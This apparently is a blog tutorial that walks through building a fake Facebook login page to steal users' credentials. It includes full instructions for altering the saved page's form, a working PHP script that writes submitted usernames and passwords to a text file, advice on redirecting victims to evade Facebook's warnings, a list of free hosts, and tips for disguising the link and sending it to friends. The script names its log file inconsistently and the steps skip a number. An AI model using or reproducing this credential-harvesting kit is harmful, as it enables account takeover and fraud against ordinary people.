WHAT IS PHISHING?
Phishing is a technique or a way of attempting to acquire sensitive or confidential information such as usernames, passwords, and credit card details by false pretense as a trustworthy entity in an electronic communication. This is done with the help of a phisher.
WHAT IS A PHISHER?
A phisher is something that looks exactly like an Original login page (fake page), that writes the victim's login data (Username and Password) to a specific file, or does whatever you want so long as you get access to the victim's login data.
Here is an example of a fake facebook login page (phisher)
HOW TO MAKE A
PHISHER?
As the saying goes:
As the saying goes:
- Dont give plenty of FISH to your friend,. Instead, you should teach him how to PHISH
Therefore, instead of just giving you the download link to the already made phishing page,.. Am going to teach you how to make your own phishing page. Well, at the end of this tutorial, i will put a download link to my already made phishing pages but first you have to learn how to make your own phisher :D
To create a successful phisher, all you need is a PHP enabled site , Notepad on your computer and a brain.
You can download Notepad v5.9++ here
Here is a list of php enabled free hosting sites:
- Freehostia - http://freehostia.com
- Freeweb7 - http://freeweb7.com
- t35 - http://t35.com
- Awardspace - http://awardspace.com
- PHPNet - http://phpnet.us
- Free Web Hosting Pro - http://freewebhostingpro.com
- ProHosts - http://prohosts.org
- 000webhost - http://000webhost.com/
- AtSpace - http://atspace.com
- My3gb - http://my3gb.com
In this tutorial am going to fucus mainly on how to prepare a phishing attack on facebook, am going to use Mozilla firefox as the browser and http://my3gb.com as the hosting site, its much easier.
STEP 1 -Creating the fake
page
- Go to facebook's login page http://www.facebook.com
- On the top left corner of your Firefox browser, Click File ->Save page As and save your page name as facebook.html
- Open facebook.html Using Notepad and search for the word ''action''
You will find it on a line that looks like this;
class="menu_login_container"><form
method="POST" action="https://ww w.facebook .com/login .php?login _attempt=1"
id="login_form"
- Now change the method to ''get'' and action to ''login.php'' so that you will have something that looks like this;
class="menu_login_container"><form
method="get" action="login.php"
id="login_form"
STEP 2- Preparing the php script
- To Create a php file, simply pasting the code below into your notepad. Then save it as login.php
------------------------------------------------------------------------------
<?php
header("Location: http://facebook.com/login.php ");
$handle = fopen("noobs.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
------------------------------------------------------------------------------
Note that in the above script, ''phished.txt'' is the file on which all hacked usernames and passwords will be saved and ''https://facebook.com/login.php'' is the Original facebook url where your victim will be redircted to after clicking the login button on your fake page. But at the moment facebook has tightened its security where by your victim will get notified of a phishing attack and would therefore be prompted to change his password right after arriving from a phishing page.
To avoid this, you should redirect your victim to any other url which is not of facebook by replacing https://facebook.com/login.php with any url. Choosing the url to redirect your victim to will all depend on the trick that you will use against your victim in the whole phishing proccess.
Please also note that this part is mainly for facebook , its ok with several other sites like gmail, hotmail e.t.c your victim will not get a warning message, including mobile facebook (http://m.facebook.com).
STEP 3- Create File where to
save hacked passwords
- Create an empty text file using notepad and rename it as phished
Note that when creating the text file, there is no
need of renaming it as phished.txt because the fact that you will save
it as a text file is enough to make it bear the extension of txt
Now you have 3 files so far;
- facebook.html
- login.php
- phished.txt
STEP 5- Uploading the 3
files
Now go to http://my3gb.com and sign up for a free hosting account the
upload the 3 files
If your phisher has
successfully been made, any email address and passwords that are typed on your
fake page will be saved on the ''phished.txt'' file
The link to your phishing page will therefore
be;
www.yourusername.my3gb.com/facebook.html
NOTE THAT:
- No One will be so dumb to click on such a link
- Facebook will automaticaly block your phishing url from being posted on facebook
- you can rename the phishing link to suite your victim's curiosity and there making it difficult for him to notice any phisher
- Your phisher will NOT be detected and blocked by facebook,..so you are free to post it or send it to a freind on facebook via inbox.
Hope you enjoyed the tutorial,.!!!
How To Hackers Hack FaceBook Account Using Phishing Attack just look here
4/
5
Oleh
Krishna Soy